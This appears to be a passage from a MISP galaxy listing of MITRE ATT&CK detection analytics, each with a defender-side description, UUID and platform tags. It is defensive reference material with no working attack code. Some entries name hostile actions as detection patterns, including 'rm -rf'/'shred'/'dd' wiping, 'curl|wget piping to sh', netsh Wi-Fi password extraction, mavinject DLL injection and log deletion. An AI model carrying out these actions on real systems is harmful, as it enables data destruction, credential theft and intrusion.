Account created via CLI using 'username' command or REST API. Detectable through AAA logging or CLI history telemetry.

Internal MISP references

UUID 614594ba-9590-4fa9-871c-3e092882c74c which can be used as unique global reference for Analytic 1240 - AN1240 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1240
mitre_platforms ['Network Devices']

Analytic 0412 - AN0412

Massive recursive deletions or overwrites via rm -rf, shred, dd, or wiper binaries. May include unlink syscalls, deletion of known config/data paths, or sequential overwrite patterns.

Internal MISP references

UUID 839d7053-fc62-433a-8eb2-ed87605160f7 which can be used as unique global reference for Analytic 0412 - AN0412 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0412
mitre_platforms ['Linux']

Analytic 0241 - AN0241

Defender observes use of CLI tools (find, grep, ls, dpkg, rpm, systemctl, ps aux) to discover backup agents or config files (e.g., rsnapshot, duplicity, veeam). This often includes command lines that recursively search /etc/, /opt/, or /var/ directories for keywords like backup, and parent-child relationships involving shell or Python scripts.

Internal MISP references

UUID 93918e31-51b1-4d85-8b16-590871c2cc1f which can be used as unique global reference for Analytic 0241 - AN0241 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0241
mitre_platforms ['Linux']

Analytic 0421 - AN0421

Forged SAML tokens can appear as SaaS logins where authentication succeeded without MFA, or where tokens contain claims inconsistent with the user profile. Look for concurrent sessions across different geographies with the same SAML assertion ID.

Internal MISP references

UUID 93c97a07-283e-46c5-b2ac-560db0382ea9 which can be used as unique global reference for Analytic 0421 - AN0421 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0421
mitre_platforms ['SaaS']

Analytic 1024 - AN1024

Encrypted traffic or ICMP tunneling from border routers to internal routers or unknown external IPs. Forwarded traffic shows consistent hop-to-hop relaying without matching configured VPN or expected network topology.

Internal MISP references

UUID a691ee45-94bf-4244-a286-b80c21859d2e which can be used as unique global reference for Analytic 1024 - AN1024 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1024
mitre_platforms ['Network Devices']

Analytic 2014 - AN2014

Once adversaries leverage the abused web service as infrastructure (ex: for command and control), it may be possible to look for unique characteristics associated with adversary software, if known.(Citation: ThreatConnect Infrastructure Dec 2020) Much of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on related stages of the adversary lifecycle, such as during Command and Control Web Service or Exfiltration Over Web Service .

Internal MISP references

UUID da084995-0644-4152-a72d-44034845173a which can be used as unique global reference for Analytic 2014 - AN2014 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN2014
mitre_platforms ['PRE']

Analytic 1402 - AN1402

Detects suspicious access to browser session cookie storage (e.g., Chrome’s Cookies SQLite DB) or memory reads of browser processes. Anomalous injection or memory dump utilities targeting browser processes such as chrome.exe, firefox.exe, or msedge.exe.

Internal MISP references

UUID dd105985-5d61-43f0-b69b-b4fd52632257 which can be used as unique global reference for Analytic 1402 - AN1402 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1402
mitre_platforms ['Windows']

Analytic 0521 - AN0521

Detects deletion or overwriting of bash history, syslog, audit logs, and .ssh metadata following privilege elevation or suspicious process spawning.

Internal MISP references

UUID 1fbe9da1-a760-4ac9-8ab0-59203a50fb82 which can be used as unique global reference for Analytic 0521 - AN0521 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0521
mitre_platforms ['Linux']

Analytic 1025 - AN1025

Detection of domain group enumeration through command-line utilities such as 'net group /domain' or PowerShell cmdlets, followed by suspicious access to API calls or LSASS memory.

Internal MISP references

UUID 2385f397-5d17-4b37-ba07-bb52a52ff66c which can be used as unique global reference for Analytic 1025 - AN1025 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1025
mitre_platforms ['Windows']

Analytic 0512 - AN0512

SQL stored procedures that invoke OS-level commands via xp_cmdshell equivalent or via UDF (User-Defined Functions) mechanisms.

Internal MISP references

UUID 2e039fd4-a1f6-4c4b-b47a-56c257335298 which can be used as unique global reference for Analytic 0512 - AN0512 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0512
mitre_platforms ['Linux']

Analytic 1052 - AN1052

Execution of PowerShell commands that modify mailbox permissions using Exchange cmdlets (e.g., Add-MailboxPermission), often tied to BEC or post-compromise persistence.

Internal MISP references

UUID 42d5a9d5-f897-4c45-b577-9b2c776c6c0d which can be used as unique global reference for Analytic 1052 - AN1052 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1052
mitre_platforms ['Windows']

Analytic 1520 - AN1520

Anomalous high-volume access to customer records in CRM software by a non-CRM admin user account, especially following initial authentication from a rare location or device. Behavior includes abnormal access to PII fields or data exports within a short time window.

Internal MISP references

UUID 616bc2d5-5c4d-4efa-9490-c77213be1de1 which can be used as unique global reference for Analytic 1520 - AN1520 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1520
mitre_platforms ['SaaS']

Analytic 0125 - AN0125

Manual or scripted installation of Chrome extensions using user scripts or config files, followed by unexpected network connections from browser processes.

Internal MISP references

UUID b5020e23-475e-4f74-a943-787e090d3e2f which can be used as unique global reference for Analytic 0125 - AN0125 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0125
mitre_platforms ['Linux']

Analytic 0152 - AN0152

Detection of adversary attempts to enumerate Group Policy settings through suspicious command execution (gpresult), PowerShell enumeration (Get-DomainGPO, Get-DomainGPOLocalGroup), and abnormal LDAP queries targeting groupPolicyContainer objects. Defenders observe unusual process lineage, script execution, or LDAP filter activity against domain controllers.

Internal MISP references

UUID bf5772b8-86b4-4d73-bbff-6abb5da9edac which can be used as unique global reference for Analytic 0152 - AN0152 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0152
mitre_platforms ['Windows']

Analytic 0251 - AN0251

Installation or execution of a malicious browser or IDE extension, followed by abnormal registry entries or outbound network connections from the host application

Internal MISP references

UUID ce76c289-b810-44cf-b71e-afc76a70f7bf which can be used as unique global reference for Analytic 0251 - AN0251 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0251
mitre_platforms ['Windows']

Analytic 2015 - AN2015

Much of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on related stages of the adversary lifecycle, such as during Phishing, Endpoint Denial of Service, or Network Denial of Service.

Internal MISP references

UUID d52fee09-db6e-4fe5-a859-7f3d273e85f0 which can be used as unique global reference for Analytic 2015 - AN2015 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN2015
mitre_platforms ['PRE']

Analytic 1502 - AN1502

Monitor for suspicious use of cloud-native administrative command services (e.g., AWS Systems Manager Run Command, Azure RunCommand, GCP OS Config) to execute code inside VMs. Detect anomalies such as commands/scripts executed by unexpected users, execution outside of maintenance windows, or commands initiated by service accounts not normally tied to administration. Correlate cloud control-plane activity logs with host-level execution (process creation, script execution) to validate if commands materialized inside the guest OS.

Internal MISP references

UUID d8d5a1c0-9ba1-4735-af42-3d5b9d7a6603 which can be used as unique global reference for Analytic 1502 - AN1502 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1502
mitre_platforms ['IaaS']

Analytic 1250 - AN1250

Detects unauthorized modifications to PAM configuration files or shared object modules. Correlates file modification events under /etc/pam.d/ or /lib/security/ with unusual authentication activity such as multiple simultaneous logins, off-hours logins, or logons without corresponding physical/VPN access.

Internal MISP references

UUID d9c7e50d-4b13-4634-80f9-e8032a043414 which can be used as unique global reference for Analytic 1250 - AN1250 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1250
mitre_platforms ['Linux']

Analytic 1205 - AN1205

Correlates Office 365 or Google Workspace audit logs for spoofed sender addresses, failed email authentication, and anomalies in message delivery metadata. Defender observes failed SPF/DKIM checks and domain mismatches tied to suspicious campaigns.

Internal MISP references

UUID e7a0e155-e0bc-45b5-b0ef-98ec4f5eea63 which can be used as unique global reference for Analytic 1205 - AN1205 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1205
mitre_platforms ['Office Suite']

Analytic 0215 - AN0215

Detects adversarial use of cloud APIs for command execution, resource control, or reconnaissance. Focuses on CLI/SDK/scripting language abuse via stolen credentials or in-browser Cloud Shells. Monitors for anomalous API calls chained with authentication context shifts (e.g., stolen token -> privileged action) and cross-service impacts.

Internal MISP references

UUID fb933fd5-5dd8-4879-b2bb-e68bc26ff60d which can be used as unique global reference for Analytic 0215 - AN0215 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0215
mitre_platforms ['IaaS']

Analytic 1026 - AN1026

Behavioral detection of domain group enumeration via ldapsearch or custom scripts leveraging LDAP over the network.

Internal MISP references

UUID 3415a6fa-a447-42f3-8155-68cf5d7cbcb3 which can be used as unique global reference for Analytic 1026 - AN1026 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1026
mitre_platforms ['Linux']

Analytic 0216 - AN0216

Detection of anomalous RDP or remote service session activity where a logon session is hijacked rather than newly created. Indicators include mismatched user credentials vs. active session tokens, service session takeovers without corresponding successful logon events, or RDP shadowing activity without user consent.

Internal MISP references

UUID 3c320df0-2a99-4bc4-b0f4-7af1675ccdb9 which can be used as unique global reference for Analytic 0216 - AN0216 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0216
mitre_platforms ['Windows']

Analytic 1602 - AN1602

ESXi shell or scheduled tasks initiating outbound HTTPS to known public services without inbound return or loggable response, used to fetch instructions.

Internal MISP references

UUID 5ce50294-f89c-4158-b5f2-7ca257a88837 which can be used as unique global reference for Analytic 1602 - AN1602 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1602
mitre_platforms ['ESXi']

Analytic 1062 - AN1062

Abnormal loading of kernel modules, direct tampering with /dev, /proc, or LD_PRELOAD behaviors hiding processes or files.

Internal MISP references

UUID 62cf396f-01d6-4ab0-a3f5-bf75d90c2c40 which can be used as unique global reference for Analytic 1062 - AN1062 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1062
mitre_platforms ['Linux']

Analytic 0162 - AN0162

Correlate unauthorized or anomalous file modifications, deletions, or metadata changes with suspicious process execution or API calls. Detect abnormal changes to structured data (e.g., database files, logs, financial records) outside expected business process activity.

Internal MISP references

UUID 64d6b35c-4785-4e2b-bc93-1f54f626a7a7 which can be used as unique global reference for Analytic 0162 - AN0162 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0162
mitre_platforms ['Windows']

Analytic 0126 - AN0126

Inconsistencies between process command-line arguments logged at creation time and subsequent process behavior. Defender perspective: monitoring for processes launched in a suspended state, followed by memory modifications (e.g., WriteProcessMemory targeting the PEB) that overwrite arguments before execution resumes. Detection also includes observing anomalous behaviors from processes whose logged arguments do not align with executed activity (e.g., network connections, file writes, or registry modifications).

Internal MISP references

UUID 84ad99e5-4e6e-4d07-93ae-9e55e6f99707 which can be used as unique global reference for Analytic 0126 - AN0126 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0126
mitre_platforms ['Windows']

Analytic 1260 - AN1260

Adversary adds federated identity provider (IdP) or modifies tenant domain authentication from Managed to Federated. Detected via API, PowerShell, or Admin Portal through federation events like Set domain authentication, Add federated identity provider, or Update-MsolFederatedDomain.

Internal MISP references

UUID a2d3072a-0f3a-46a1-a92e-f0d7ae030b48 which can be used as unique global reference for Analytic 1260 - AN1260 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1260
mitre_platforms ['Identity Provider']

Analytic 2016 - AN2016

Much of this takes place outside the visibility of the target organization, making detection difficult for defenders.

Detection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.

Internal MISP references

UUID a62c45c3-3471-4366-9f7c-738fbd9473bd which can be used as unique global reference for Analytic 2016 - AN2016 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN2016
mitre_platforms ['PRE']

Analytic 1620 - AN1620

Detection of suspicious use of tscon.exe or equivalent methods to hijack legitimate RDP sessions. Defenders can observe anomalies such as session reassignments without corresponding authentication, processes spawned in the context of hijacked sessions, or unusual RDP network traffic flows that deviate from expected baselines.

Internal MISP references

UUID be773ad4-9e5f-4063-910a-99a3cab90582 which can be used as unique global reference for Analytic 1620 - AN1620 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1620
mitre_platforms ['Windows']

Analytic 0261 - AN0261

Detects unusual use of cron or sleep loops inside containers executing unfamiliar scripts or binaries repeatedly.

Internal MISP references

UUID d20d7cf8-ecac-4011-96e0-3ec862223c11 which can be used as unique global reference for Analytic 0261 - AN0261 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0261
mitre_platforms ['Containers']

Analytic 1206 - AN1206

Suspicious use of NTFS file attributes such as Alternate Data Streams (ADS) or Extended Attributes (EA) to hide data. Defender perspective: anomalous file creations or modifications containing colon syntax (file.ext:ads), API calls like ZwSetEaFile/ZwQueryEaFile, or PowerShell/Windows utilities interacting with -stream parameters. Correlation across file metadata anomalies, process lineage, and command execution provides context.

Internal MISP references

UUID dba3fe8d-6080-4efe-9b93-6eda138ac771 which can be used as unique global reference for Analytic 1206 - AN1206 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1206
mitre_platforms ['Windows']

Analytic 0621 - AN0621

Processes invoking AVFoundation or CoreAudio frameworks, accessing input devices via TCC logs or Unified Logs, followed by writing AIFF/WAV/MP3 files to disk.

Internal MISP references

UUID f79a68ff-07f4-49ba-849b-9edb636f0b39 which can be used as unique global reference for Analytic 0621 - AN0621 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0621
mitre_platforms ['macOS']

Analytic 0612 - AN0612

Detection of container escape attempts via bind mounts, privileged containers, or abuse of docker.sock. Defenders may observe anomalous volume mount configurations (e.g., hostPath to / or /proc), unexpected privileged container launches, or use of container administration commands to access host resources. These events typically correlate with subsequent process execution on the host outside of normal container isolation.

Internal MISP references

UUID fc9161ef-3cab-45f5-a585-d78778d72f2b which can be used as unique global reference for Analytic 0612 - AN0612 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0612
mitre_platforms ['Containers']

Analytic 1207 - AN1207

Abuse of mavinject.exe to inject DLLs or import descriptors into another running process. Chain: (1) mavinject.exe starts with /INJECTRUNNING or /HMODULE → (2) mavinject obtains high-access handles to a target process (VM_WRITE/CREATE_THREAD) → (3) target process loads attacker DLL (module load) → (4) optional follow-on child activity or network egress from the target process.

Internal MISP references

UUID 0fff438f-1aa9-4424-be94-a08b400adcb0 which can be used as unique global reference for Analytic 1207 - AN1207 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1207
mitre_platforms ['Windows']

Analytic 1027 - AN1027

Enumeration of domain groups using dscacheutil or dscl commands, often following initial login or domain trust queries.

Internal MISP references

UUID 23fa40ac-79d0-400a-a017-8e06cfc67e6c which can be used as unique global reference for Analytic 1027 - AN1027 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1027
mitre_platforms ['macOS']

Analytic 0127 - AN0127

Execution of discovery commands or API calls for virtualization artifacts (e.g., registry keys, device drivers, services), sleep/skipped execution behavior, or sandbox evasion DLLs before payload deployment.

Internal MISP references

UUID 55808d73-7aa9-4f2c-8122-8e60bf14f4c6 which can be used as unique global reference for Analytic 0127 - AN0127 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0127
mitre_platforms ['Windows']

Analytic 2017 - AN2017

Once adversaries have provisioned compromised infrastructure (ex: a server for use in command and control), internet scans may help proactively discover compromised infrastructure. Consider looking for identifiable patterns such as services listening, certificates in use, SSL/TLS negotiation features, or other response artifacts associated with adversary C2 software.(Citation: ThreatConnect Infrastructure Dec 2020)(Citation: Mandiant SCANdalous Jul 2020)(Citation: Koczwara Beacon Hunting Sep 2021) Consider monitoring for anomalous changes to domain registrant information and/or domain resolution information that may indicate the compromise of a domain. Efforts may need to be tailored to specific domains of interest as benign registration and resolution changes are a common occurrence on the internet. Monitor for queried domain name system (DNS) registry data that may compromise third-party infrastructure that can be used during targeting. Detection efforts may be focused on related stages of the adversary lifecycle, such as during Command and Control. Monitor for logged domain name system (DNS) data that may compromise third-party infrastructure that can be used during targeting. Detection efforts may be focused on related stages of the adversary lifecycle, such as during Command and Control. Monitor for contextual data about an Internet-facing resource gathered from a scan, such as running services or ports that may compromise third-party infrastructure that can be used during targeting. Detection efforts may be focused on related stages of the adversary lifecycle, such as during Command and Control.

Internal MISP references

UUID 816aaddd-dc6d-49da-8ecd-8afde6278181 which can be used as unique global reference for Analytic 2017 - AN2017 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN2017
mitre_platforms ['PRE']

Analytic 1072 - AN1072

Adversary use of bash/zsh or AppleScript to locate files and exfil targets like user keychains or documents.

Internal MISP references

UUID a48f36c7-e946-4270-ae23-1a2e52ae2e24 which can be used as unique global reference for Analytic 1072 - AN1072 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1072
mitre_platforms ['macOS']

Analytic 0721 - AN0721

Forged credentials on macOS may be visible through Unified Logs showing abnormal access to Keychain or browser session files. Correlated with anomalous web session usage from Safari or Chrome processes outside typical user context.

Internal MISP references

UUID b2569010-23c0-4dd8-9e53-3537c1e89efc which can be used as unique global reference for Analytic 0721 - AN0721 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0721
mitre_platforms ['macOS']

Analytic 0712 - AN0712

Detects extraction or mounting of container/archive files (e.g., .iso, .vhd, .zip) that originated from the Internet but whose contained files lack Zone.Identifier MOTW tagging. Correlates file creation metadata with subsequent execution of unsigned or untrusted binaries launched outside SmartScreen or Protected View.

Internal MISP references

UUID c7172412-6e48-45a0-a1c5-2eae892c1fc7 which can be used as unique global reference for Analytic 0712 - AN0712 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0712
mitre_platforms ['Windows']

Analytic 0271 - AN0271

Processes using Win32 API calls (e.g., EnumWindows, GetForegroundWindow) or scripting tools (e.g., PowerShell, VBScript) to enumerate open windows. These often appear with reconnaissance or data collection TTPs.

Internal MISP references

UUID c76d69b2-f1d4-4867-965b-886b6caf95be which can be used as unique global reference for Analytic 0271 - AN0271 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0271
mitre_platforms ['Windows']

Analytic 1270 - AN1270

Burst of failed login attempts across VM instances using leaked credential pairs from single IP in public cloud environments

Internal MISP references

UUID de41a23b-b07d-411b-80f7-d1a8f55ba459 which can be used as unique global reference for Analytic 1270 - AN1270 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1270
mitre_platforms ['IaaS']

Analytic 0172 - AN0172

Detects Python execution via python.exe or py.exe with anomalous parent lineage (e.g., Office macros, LOLBAS), execution from unusual directories, or chained network/PowerShell/system-level activity.

Internal MISP references

UUID f392a2cb-dd4b-4585-84d5-1fa4bd65ff60 which can be used as unique global reference for Analytic 0172 - AN0172 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0172
mitre_platforms ['Windows']

Analytic 0217 - AN0217

Detection of SSH/Telnet session hijacking via discrepancies between authentication logs and active session tables. Adversary behavior includes reusing or stealing active PTY sessions, attaching to screen/tmux, or issuing commands without corresponding login events.

Internal MISP references

UUID fba8a3f5-74d0-47d2-a688-1bdcc99dae6b which can be used as unique global reference for Analytic 0217 - AN0217 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0217
mitre_platforms ['Linux']

Analytic 1720 - AN1720

Application vetting services could detect usage of standard clipboard APIs.

Internal MISP references

UUID 2f0ca83e-1318-4722-88b2-1bffedb5d127 which can be used as unique global reference for Analytic 1720 - AN1720 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1720
mitre_platforms ['iOS']

Analytic 1702 - AN1702

Enterprises may be able to detect anomalous traffic originating from mobile devices, which could indicate compromise.

Internal MISP references

UUID cb78ff0f-6f8a-41a8-a199-4660a0addec9 which can be used as unique global reference for Analytic 1702 - AN1702 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1702
mitre_platforms ['Android']

Analytic 0128 - AN0128

Execution of commands to enumerate virtualization-related files or processes (e.g., '/sys/class/dmi/id/product_name', dmesg, lscpu, lspci), or querying hypervisor interfaces prior to malware execution.

Internal MISP references

UUID 412b76ec-d44e-4064-9dc1-32cf793f0176 which can be used as unique global reference for Analytic 0128 - AN0128 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0128
mitre_platforms ['Linux']

Analytic 1208 - AN1208

Detects creation or modification of user-level Launch Agents in monitored directories using .plist files with suspicious ProgramArguments or RunAtLoad keys. Correlates file write activity with execution of launchctl or unsigned binaries invoked at login.

Internal MISP references

UUID 441bfb28-3fe5-410b-93a5-2280a7f19dad which can be used as unique global reference for Analytic 1208 - AN1208 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1208
mitre_platforms ['macOS']

Analytic 0281 - AN0281

Detects embedded Lua interpreter execution or script injection on devices supporting Lua scripting (e.g., routers, firewalls), often seen in modified firmware or abused APIs.

Internal MISP references

UUID 755fb4b5-903f-4694-b591-04078afa27aa which can be used as unique global reference for Analytic 0281 - AN0281 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0281
mitre_platforms ['Network Devices']

Analytic 0812 - AN0812

Detection of file execution where the file name contains a trailing space to masquerade as a known executable. Adversaries may exploit the way command line interpreters handle file names with trailing whitespace.

Internal MISP references

UUID 778e2c18-2b26-4dd4-b4b2-3f8310d57a07 which can be used as unique global reference for Analytic 0812 - AN0812 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0812
mitre_platforms ['Linux']

Analytic 2018 - AN2018

Monitor call logs from corporate devices to identify patterns of potential voice phishing, such as calls to/from known malicious phone numbers.

Internal MISP references

UUID 80e453fd-8191-474a-b577-7a575ef5fe87 which can be used as unique global reference for Analytic 2018 - AN2018 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN2018
mitre_platforms ['PRE']

Analytic 0182 - AN0182

PowerShell or script execution with parameters that suppress errors or ignore user interrupts, such as -ErrorAction SilentlyContinue. Defender perspective: detecting discrepancies between suppressed error arguments and continued execution behavior.

Internal MISP references

UUID 80e9341d-7ea4-4684-8f27-54566e996ce6 which can be used as unique global reference for Analytic 0182 - AN0182 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0182
mitre_platforms ['Windows']

Analytic 0218 - AN0218

Detection of hijacked VNC or SSH sessions on macOS where adversaries take over an existing session rather than authenticating directly. Indicators include process execution from active sessions without new logon events, manipulation of TTY sessions, or anomalous network activity tied to dormant sessions.

Internal MISP references

UUID 81889314-3404-4cfb-a650-52a5898b6f31 which can be used as unique global reference for Analytic 0218 - AN0218 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0218
mitre_platforms ['macOS']

Analytic 1280 - AN1280

Enumeration of saved Wi-Fi profiles and cleartext password retrieval using netsh wlan or API-level access to wlanAPI.dll.

Internal MISP references

UUID 8d58973f-7fd7-435e-86b8-58f9b399f89f which can be used as unique global reference for Analytic 1280 - AN1280 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1280
mitre_platforms ['Windows']

Analytic 1028 - AN1028

Abuse of Regsvcs.exe or Regasm.exe to execute arbitrary code embedded in .NET assemblies via [ComRegisterFunction]/[ComUnregisterFunction]. Behavioral chain: (1) Process creation of regsvcs/regasm with suspicious assembly paths/flags → (2) Assembly/DLL load inside regsvcs/regasm → (3) Registry writes to HKCR\CLSID/ProgID during COM registration → (4) Optional child process or network activity spawned by installer/registration code.

Internal MISP references

UUID a5e9fb06-ab75-415d-beff-206aa059e096 which can be used as unique global reference for Analytic 1028 - AN1028 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1028
mitre_platforms ['Windows']

Analytic 0821 - AN0821

User or desktop application writes a new file to ~/Downloads, /tmp, or mounted removable media followed by execve of a risky interpreter/loader (bash, sh, python, perl, php, node, curl|wget piping to sh, ld.so, rdesktop, xdg-open - with unusual args). Uses auditd PATH+SYSCALL (open/creat/write/rename) with execve event linking.

Internal MISP references

UUID e0b64d4e-79e0-47b8-a95c-414e2b69406d which can be used as unique global reference for Analytic 0821 - AN0821 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0821
mitre_platforms ['Linux']

Analytic 1082 - AN1082

Identifies use of sh/bash/zsh in suspicious context, such as user scripts launched from non-standard apps (e.g., Preview.app), embedded in LaunchDaemons, or executed outside Terminal.app. Looks for misuse in Automator, LaunchAgents, or NSAppleScript-executed shell.

Internal MISP references

UUID ebd61e14-852c-403b-8b50-7e15a1c32d05 which can be used as unique global reference for Analytic 1082 - AN1082 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1082
mitre_platforms ['macOS']

Analytic 1820 - AN1820

Google sends a notification to the device when Android Device Manager is used to locate it. Additionally, Google provides the ability for users to view their general account activity and alerts users when their credentials have been used on a new device. Apple iCloud also provides notifications to users of account activity such as when credentials have been used.

Internal MISP references

UUID 40066e48-f70c-4fbb-a2cf-d7a385171edb which can be used as unique global reference for Analytic 1820 - AN1820 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1820
mitre_platforms ['Android']

Analytic 1802 - AN1802

Mobile security products can often alert the user if their device is vulnerable to known exploits.

Internal MISP references

UUID a69cefd7-02e8-4840-a26e-2ea0b6a95812 which can be used as unique global reference for Analytic 1802 - AN1802 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1802
mitre_platforms ['Android']

Analytic 1209 - AN1209

Detection focuses on identifying abuse of LD_PRELOAD and related linker variables. Defender perspective: monitor unexpected setting or modification of LD_PRELOAD in shell initialization scripts or environment exports, file creation of suspicious shared libraries, and correlation of these modifications with anomalous process execution. Key signals include execve events with LD_PRELOAD defined, newly created .so files in user directories, and processes hooking libc functions exhibiting abnormal behavior.

Internal MISP references

UUID 048adb6e-49a1-463e-bc0d-0a9a543cf0ce which can be used as unique global reference for Analytic 1209 - AN1209 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1209
mitre_platforms ['Linux']

Analytic 0192 - AN0192

Phishing attempts targeting IdPs often manifest as anomalous login attempts from suspicious email invitations or fake SSO prompts. Detection correlates login flows, MFA bypass attempts, and anomalous geographic patterns following phishing email delivery.

Internal MISP references

UUID 09df0b88-e1ae-4a1e-86c4-8bb00e79baed which can be used as unique global reference for Analytic 0192 - AN0192 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0192
mitre_platforms ['Identity Provider']

Analytic 0219 - AN0219

Adversary sends crafted HTTP/S (or other service) input to an Internet-facing app (IIS/ASP.NET, API, device portal). Chain: (1) abnormal request patterns to public endpoint → (2) elevated 4xx/5xx or unusual methods/paths → (3) server process (w3wp.exe/other service) spawns shell/LOLbins or loads non-standard modules → (4) optional outbound callback from the host/container.

Internal MISP references

UUID 17290910-5b25-477a-a0c0-c2661ff2585e which can be used as unique global reference for Analytic 0219 - AN0219 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0219
mitre_platforms ['Windows']

Analytic 0291 - AN0291

Detects unauthorized changes to IAM authentication configurations such as disabling MFA, creating backdoor access keys, or altering trust policies. Correlates identity policy updates with unusual login behavior.

Internal MISP references

UUID 20b6d23a-d1cc-494c-ac67-e7358835c674 which can be used as unique global reference for Analytic 0291 - AN0291 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0291
mitre_platforms ['IaaS']

Analytic 1092 - AN1092

Detects suspicious gratuitous ARP responses or inconsistent IP-to-MAC mappings using auditd and packet capture. Behavioral focus is on unsolicited replies overriding legitimate ARP ownership.

Internal MISP references

UUID 5ee16525-5e86-4634-aa75-37468c4034c4 which can be used as unique global reference for Analytic 1092 - AN1092 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1092
mitre_platforms ['Linux']

Analytic 1290 - AN1290

Detects rogue DHCP server activity and anomalous DHCP OFFER/ACK messages assigning unexpected DNS or gateway values. Detection correlates DHCP server role changes, DHCP exhaustion warnings, and sudden network configuration changes across endpoints.

Internal MISP references

UUID 780021a3-d3e6-4c5b-a976-1c3715b990e2 which can be used as unique global reference for Analytic 1290 - AN1290 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1290
mitre_platforms ['Windows']

Analytic 0921 - AN0921

Tracks modification of executables or interpreter payloads (e.g., Mach-O, dylib) that mutate across runs—using scripting engines, JIT compilers, or side-loaded plugins.

Internal MISP references

UUID 8fba0b53-2aca-4cca-8856-714e0f05665b which can be used as unique global reference for Analytic 0921 - AN0921 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0921
mitre_platforms ['macOS']

Analytic 2019 - AN2019

